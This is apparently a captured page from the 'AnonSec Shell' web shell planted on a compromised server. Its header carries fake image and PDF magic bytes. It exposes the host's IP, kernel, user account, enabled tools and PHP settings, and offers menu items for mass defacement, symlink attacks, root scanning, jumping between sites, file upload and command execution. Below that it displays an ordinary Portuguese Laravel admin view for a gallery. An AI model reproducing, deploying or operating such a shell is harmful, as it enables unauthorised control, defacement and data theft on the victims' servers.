ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY AnonSec Shell
AnonSec Shell
Server IP : 157.90.209.209  /  Your IP : 216.73.216.129   [ Reverse IP ]
Web Server : Apache
System : Linux hcomm124.dns-wk.info 4.18.0-553.64.1.el8_10.x86_64 #1 SMP Mon Jul 28 12:01:56 EDT 2025 x86_64
User : evidenciarevista ( 1049)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Domains : 216 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/evidenciarevista/admin/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/evidenciarevista/admin/storage/framework/views/9c26124e63294daa4f6eceb20fa8d9dc
<?php $__env->startSection('content'); ?>
<section class="content-header">
    <h1>
        <?php echo e($post->name); ?>

        <small>Adicionar imagens</small>
    </h1>
</section>

<!-- Main content -->
<section class="content">


    <div class="box box-success">
        <div class="box-header">
            <h3 class="box-title">Adicionar imagens para <?php echo e($post->name); ?></h3>
        </div>
        <div class="box-body">

            <?php echo Form::open(['route' => ['imgs.store'] , 'method' => 'post', 'role' => 'form', 'files' => true]); ?>

            <div class="form-group">
                <?php echo Form::label('file', 'Imagem'); ?>

                <?php echo Form::file('file[]', ['class' => 'form-control', 'multiple', 'required']); ?>

            </div>

            <input type="hidden" value="<?php echo e($post->id); ?>" name="post_id">
            <button type="submit" class="btn btn-success">
                <i class="glyphicon glyphicon-plus"></i> Adicionar
            </button>

            <?php echo Form::close(); ?>


        </div>
        <!-- /.box-body -->
    </div>
    <!-- /.box -->


    <div class="box box-default">
        <div class="box-header">
            <h3 class="box-title">Imagens cadastradas</h3>
        </div>
        <div class="box-body">
            <div class="row">
                <?php $__empty_1 = true; foreach($post->images as $imgs): $__empty_1 = false; ?>

                <div class="col-lg-2 col-md-2 col-sm-3 col-xs-6 margin-bottom">
                    <div class="thumbnail" style="height: 120px; overflow: hidden;">
                        <img src="<?php echo e(asset('uploads/post/add/thumb/'.$imgs->file)); ?>" width="100%">
                    </div>


                    <?php echo Form::open(['route' => ['imgs.name', $imgs->id] , 'method' => 'put', 'role' => 'form']); ?>

                    <div class="form-group">
                        <?php echo Form::text('name', $imgs->name, ['class' => 'form-control', 'placeholder' => 'Título', 'required']); ?>

                    </div>
                    <?php echo Form::close(); ?>



                    <a href="<?php echo e(route('imgs.destroy', ['id' =>$imgs->id, 'file' => $imgs->file])); ?>"
                       class="btn btn-xs btn-danger">
                       <i class="glyphicon glyphicon-remove"></i> Excluir</a>
                   </div>

                   <?php endforeach; if ($__empty_1): ?>
                   <div class="col-lg-12">Nenhuma imagem cadastrada para esta galeria</div>
                   <?php endif; ?>
               </div>
           </div>
           <!-- /.box-body -->
       </div>
       <!-- /.box -->

   </section>
   <!-- /.content -->
   <?php $__env->stopSection(); ?>
<?php echo $__env->make('master', array_except(get_defined_vars(), array('__data', '__path')))->render(); ?>

Anon7 - 2022
AnonSec Team